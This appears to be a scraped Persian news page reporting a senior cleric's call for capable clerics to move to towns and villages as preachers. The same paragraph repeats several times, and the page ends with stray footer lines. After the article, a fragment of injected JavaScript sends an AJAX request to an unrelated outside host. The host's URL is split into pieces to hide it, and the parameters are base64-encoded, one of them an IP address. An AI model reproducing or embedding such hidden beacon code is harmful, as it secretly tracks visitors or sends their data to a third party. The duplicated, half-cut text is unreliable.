ضرورت هجرت علما و روحانیون توانمند به شهرها و روستا

ضرورت هجرت علما و روحانیون توانمند به شهرها و روستا
یکی از مراجع تقلید گفت:‌ هجرت علما و روحانیون توانمند به شهرها و روستا از جمله موارد ضروری است زیرا در شرایطی قرار داریم که جامعه نیازمند مبلغان توانمند برای پاسخگویی است و این نیاز اکنون وجود دارد و لازم است برای برطرف شدن این نیاز توجه بیشتری از سوی مسؤولان حوزه‌ها شود.

ضرورت هجرت علما و روحانیون توانمند به شهرها و روستا

یکی از مراجع تقلید گفت:‌ هجرت علما و روحانیون توانمند به شهرها و روستا از جمله موارد ضروری است زیرا در شرایطی قرار داریم که جامعه نیازمند مبلغان توانمند برای پاسخگویی است و این نیاز اکنون وجود دارد و لازم است برای برطرف شدن این نیاز توجه بیشتری از سوی مسؤولان حوزه‌ها شود.
ضرورت هجرت علما و روحانیون توانمند به شهرها و روستا
i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTY3MDc0NzU1YzFhNjM1NmYxNWVlNTY0MTNhYTE5Y2M3NDAwYzEx&crc=87bebb16cfcb667816d0e23ba5ff16eb1c3cc06b&cv=1’});

MIT License

View more posts from this author